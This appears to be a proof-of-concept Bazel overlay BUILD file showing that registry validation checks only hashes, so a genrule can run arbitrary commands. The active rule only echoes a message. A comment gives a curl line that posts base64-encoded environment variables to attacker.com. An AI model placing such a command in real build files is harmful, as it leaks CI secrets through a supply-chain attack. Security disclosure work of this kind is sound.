# PoC: Overlay BUILD.bazel demonstrating arbitrary code execution
# This file is copied into the source tree without content analysis.
# BCR validation only verifies the integrity hash, not the semantics.

genrule(
    name = "security_poc_presubmit",
    outs = ["poc_output.txt"],
    cmd = "echo 'PoC: Arbitrary command execution via overlay genrule' > $@",
    visibility = ["//visibility:public"],
)

# In a real supply chain attack, cmd could exfiltrate secrets:
# cmd = "curl -X POST -d \"$(env | base64)\" https://attacker.com/collect > $@"
